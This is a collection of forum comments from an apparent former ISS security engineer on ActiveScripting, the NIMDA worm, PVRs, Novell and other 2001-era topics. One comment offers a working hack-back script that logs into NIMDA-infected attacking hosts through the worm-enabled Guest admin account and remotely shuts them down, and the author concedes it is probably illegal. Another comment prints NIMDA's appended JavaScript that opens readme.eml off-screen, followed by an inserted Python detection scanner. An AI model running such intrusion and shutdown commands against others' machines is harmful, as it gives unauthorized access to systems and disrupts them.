Will you explain to me why ActiveScripting (the API) is inherently itself insecure?
My experience has been that most of the script-related security problems on Windows are not the scripting language itself, nor the API that binds it to the browser. They were caused by poorly written COM objects which were then accessed via scripts. Even NIMDA, though it uses JavaScript to launch off a web page, is actually exploiting a hole in IE/Outlook express.
I worked for Internet Security Systems for four years, and wrote a lot of the guts of their Intrusion Detection System, so I think I have a decent familiarity with the security issues here.
But maybe I missed something, feel free to explain what...
I'm not trolling. It's a legitimate answer to the guy's question. Like it or not, the vast majority of people who browse most web pages are using Windows. So if you want to build scriptable web pages to target those users, you are going to have to target Windows.
If someone is interested in adding pluggable scripting functionality to other platforms, it would certainly benefit the runtime authors if they could use similar integration APIs on each platform. ActiveScripting or AppleScripting (mentioned elsewhere in this thread) could be ported to *nix to become that API, and new languages could become cross-platform more easily.
I'm platform agnostic. I'm also pragmatic, and I'd rather use something that already exists than have to re-invent the wheel.
Caveat reader: I work for this company, and on this product, so I am not unbiased.
WhatsUp Gold by Ipswitch is a network monitoring product that builds nice maps of your network by auto-discovering your systems. It has nice scalable (vector graphic) icons for common system types and lets you create your own.
The new version which is due out later this year has a very flexible import/export system for maps so that you could easily use WUG to generate the maps then export them (in XML, for instance) to another program for tweaking.
Its main use is to monitor your systems and page/email/phone/etc you when things go down.
This already exists on Windows, it's called ActiveScripting. Basically, the APIs that both VBScript and JScript (JavaScript) use to integrate themselves into the browser are exposed to others as well. If you follow the API guidelines, then you can use any scripting language from any hosting program including IE.
Of course, the problem is that a web site owner can't assume that an end user has a given language runtime installed. So that limits how you can use it. But it could have great applications on intranets where you have more control over the client situation.
ActiveState has versions of Perl, Python and TCL that follow these APIs on Windows. Here is a session they were going to do at the cancelled O'Reilly P2P conference on using this stuff.
Here's a better way. THIS WORKS. It takes advantage of the fact that NIMDA (1) enables the Guest account, (2) blanks its password and (3) puts Guest into the Administrators group.
Use whatever tool you use to detect incoming NIMDA attacks toward your servers. A simple way is to just put a dummy port 80 listener on a box that nobody has any reason to connect to, and assume all incoming port 80 connects are from worms or other attackers.
Whenever you get an attack, launch the following script:
net use \\%1 /user:guest
psshutdown -t 5 -m "This system is infected with NIMDA! Shutting down..." -f \\%1
net use \\%1 /d
%1 in the above should be the attacking IP.
This uses PSSHUTDOWN.EXE which you can download from System Internals. It could easily be adapted to use SHUTDOWN.EXE from the resource kit.
Yes, I realize this is probably illegal in most jurisdictions. Save your flames.
If you have Javascript disabled by default in your browser, these infected web pages are not a problem.
I'm also not sure if it has wishlists, and I know it doesn't have suggestions.
Yes, Replay has wishlists. In fact, it had them before Tivo did. That was one of the main reasons I got Replay instead of Tivo two years ago.
About prioritizing: I find with the Replay the best way to go is to use what they call "non guaranteed" programs for nearly everything. That lets the Replay manage the disk space just like Tivo does. You only set "guaranteed" for those programs that you ABSOLUTELY gotta record, like a live broadcast that will never be repeated. If you follow that, you rarely have to deal with conflicts, though occasionally it might not record exactly what you thought it would.
I know this is offtopic (so flame away) and this is an old bugaboo, but it's annoying to me. I submitted this same item, with the link to the original story on The NY Times as well as four or five other useful links (including to the actual patent) on Friday afternoon, and it was rejected:
2001-08-17 15:37:07 Stem Cells are Patented (articles,news) (rejected)
Do the Slashdot editors ever talk to each other or coordinate what they are doing in any way? I try to submit stories regularly, but they always get rejected. I don't know why I bother.
Lots of folks have mentioned other brands of players that play CD's containing MP3's. Here's a quick plug for a really nice one by TDK called the MOJO.
It plays normal CD's, CD-R's and CD-RW's. It has up to 8 minutes of shock protection for MP3's (it actually spins down the disk). It uses normal AA batteries. It can play MP3's no matter how you organize them on the disk, not limited to root directory. And best of all it has a really nice UI on its LCD screen. Don't take my word for it, read another review here.
The mention of how Microsoft is piggy backing on the BSA's efforts to make sales in the target cities, reminded me of a great investigative article that Mother Jones magazine ran some three years ago.
In this 1998 report entitled "Overseas Invasion", they report how the BSA offices in other countries are often run solely by a Microsoft employee, and act as if they are just an arm of Microsoft marketing.
This included cases where companies were actually investigated and found to be non-compliant on a variety of products from different vendors, but BSA "wiped the slate clean" if the company bought a big site license for Microsoft Office! Quite insidious.
I think I can predict some tactics that Macrovision may use to prevent people from bypassing this scheme.
Of course, they can go the DMCA route, that would be a natural. But there's another route.
It turns out Macrovision has been patenting not only the techniques that they use, but techniques for defeating them! By patenting ways around their copy protection before it's even released, they can legally prevent circumvention devices through civil patent infringement lawsuits.
Here are some of their patents on circumvention of their earlier video stuff:
>> I'm basically thinking that they shoot
>> each "sequence with an anchor" twice, once
>> saying "ScrapHeads", once saying "JunkYard
>> Wars".
Well, it's "Scrapheap" for one thing.
And if you watch the Robert Llewellyn shows very carefully, you will notice that he NEVER actually says "Junkyard Wars". And, in fact, occasionally you can catch him saying "Scrapheap". (Trust me, I have every single episode on tape).
You also occasionally can *see* the British name of the show, for instance in the one where they raised the car out of the lake, each car had "Scrapheap" painted on the side of it. (Also a banner with the show logo on the host truck in some of the remote challenges, and when trophies are awarded).
That's why they add those endlessly repetitive bumpers at the commercial breaks to remind you of the American name of the show, because the host doesn't say it.
Of course, this just applies to the ones that have aired so far. For the upcoming shows, they may well do something like you are talking about. I doubt it though, because it appears now they film separate American and British series, with separate hosts. Too bad, I really liked Llewellyn's style.
At least George Gray is out for the next series! I found him very annoying.
If this restored the live-action TV, then you're still not regaining the lost freeze-frame feature. If this turns off the ad and returns you to the current program, frozen on the screen, then it's a little more acceptable.
It turns off the ad and puts the frozen frame back on the screen.
Although the question raised by this article is still valid, the basic facts that provoked it are already obsolete. ReplayTV has already disabled this feature.
In fact, they did so months ago!
I'm a very happy long-time Replay owner (since October of 1999) and I agree with the author that the product has significant advantages over Tivo. However, I think he's blown this all out of proportion.
First of all, when you are pausing the show you are watching, what difference does it make if they put an advertisement on the screen? Really, is it that much of an intrusion? Come on!
Second of all, even when this feature was still active (and it's been disabled for months now) you could bypass the ads simply by pressing one more key after you hit Pause. (The Exit key).
Once again, this is much ado about nothing, in the case of the specific ReplayTV feature, anyway.
How about one entire generation of CPU's, the 80286? This was Intel's first attempt to add a "protected mode" to the x86 architecture, and judging from the support they got from the OS vendors, they pretty much botched it. Until the 386 came out, 286 systems were pretty much used as really fast 8086's and their extra capabilities were wasted.
They spun that part of the business off already (on: Is Novell Doomed?)
FYI: Caldera was built out of a division that Novell sold off in 1996. Novell also used to own UnixWare until it was sold to SCO, but then SCO sold a bunch of its business to Caldera.
Caldera and Novell are based in the same city and already cooperate on a number of Novell-related Linux initiatives. So look to Caldera to do what you suggested.
Two fundamental errors in your analysis (on: Is Novell Doomed?)
> and even NDS is losing ground to
> LDAP based solutions.
That's a classic 'apples and oranges' statement. LDAP is a protocol to access a directory. NDS is an implementation of a directory. To say NDS is losing ground to LDAP is like saying "sendmail is losing ground to MAPI". Doesn't make any sense. NDS supports LDAP just as nicely as any other implementation, so if you need LDAP, then NDS is still a valid option for you.
> could make Netware largely irrelevant,
> especially now that most network
> printers are all direct-IP addressable
> and have little need for a print server
You don't work in a big office do you? I don't know too many printers that have gigabytes of RAM or disk space in them, and yet many office printers have many gigabytes of print jobs queued up to them constantly. Plus, allowing everyone in your organization unblocked access to the printer IP opens you up to all sorts of denial of service attacks on the printer.
No, print servers are not going away any time soon. Sorry.
I'm not sure I understand your argument vis-a-vis MS antitrust at all, but I can't offer anything that hasn't already been said here.
>> DO NOT TRY TO GO TO AN INFECTED IP ADDRESS
I posted earlier in the thread: If you have Javascript disabled in your browser, the EML execution will not happen. It does it via a window.open command.
But everyone here has Javascript disabled for unknown web sites, right?
Here's the script it adds to the bottom of the page. It does it OUTSIDE the <HTML> </HTML> wrappers to the page, so it's really obvious it was just tacked onto the end...
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> </html>
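As an added example (not from the post, and not any ISS or Slashdot code), here is a small Python scanner that turns the two observations above into detection heuristics for web content served from a possibly infected IIS box: a script block sitting after the page's real closing </html> tag, and a window.open call pointing at a .eml file, here with off-screen coordinates. The two sample pages are constructed.

```python
import re

# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html>
<head><title>Intranet home</title></head>
<body>
<p>Welcome.</p>
<script language="JavaScript">document.write(new Date());</script>
</body>
</html>
"""

# Same page with the worm-style snippet tacked on after the real closing
# </html>, exactly the placement the post describes.
INFECTED_PAGE = CLEAN_PAGE + (
    '<html><script language="JavaScript">window.open("readme.eml", null, '
    '"resizable=no,top=6000,left=6000")</script> </html>'
)

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script\s*>",
                          re.IGNORECASE | re.DOTALL)
# window.open(...) whose first argument is a .eml file.
OPENS_EML = re.compile(r"""window\.open\s*\(\s*['"][^'"]*\.eml['"]""",
                       re.IGNORECASE)
# top=/left= coordinates of 1000 or more push the new window off-screen.
OFFSCREEN = re.compile(r"\b(?:top|left)\s*=\s*\d{4,}", re.IGNORECASE)


def trailing_content(page):
    """Return everything after the first closing </html> tag ('' if none)."""
    m = CLOSE_HTML.search(page)
    return page[m.end():].strip() if m else ""


def scan_page(page):
    """Return a list of human-readable findings for one HTML document."""
    findings = []
    # Heuristic 1: any <script> that lives outside the document proper.
    if SCRIPT_BLOCK.search(trailing_content(page)):
        findings.append("script block appended after the closing </html>")
    # Heuristic 2: a script that pops open a .eml file, optionally off-screen.
    for body in SCRIPT_BLOCK.findall(page):
        if OPENS_EML.search(body):
            findings.append("script opens a .eml file via window.open")
            if OFFSCREEN.search(body):
                findings.append("popup positioned off-screen (top/left >= 1000)")
    return findings


def is_suspicious(page):
    """True when any heuristic fires."""
    return bool(scan_page(page))


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, "->", scan_page(page) or "no findings")
```

The first heuristic needs no knowledge of the payload, so it also catches variants that change the file name or the script body.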
...would anyone really want to live or work right next to a 30 meter diameter turbine? I wouldn't.
Both were based on processes found in nature.
Both feature very simplistic mechanisms at their heart which aggregate to exhibit larger behaviors.
Both use random choices at the core to drive it all.
Both feature feedback loops that influence the progress of the evolution.
The latter seems supported by a wide variety of companies.
Get with the program, almost all decent CD players have skip protection. Philips says this one has 100 seconds of skip protection on the specs page.
Human Task Switches Considered Harmful
He's got many good rants on that site.
In the interest of full disclosure, I must point out that Microsoft and the BSA responded in a later issue of the magazine.
Bell Labs did in fact patent the transistor. Read about it here.
Of course patents only lasted 17 years then, so that patent expired some 35 years ago, before the Japanese electronics industries really got going.
No offense to our competitors at the company referenced, but ISS issued an advisory on this over a year ago. Read it here:
Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications--Tim Farley, ISS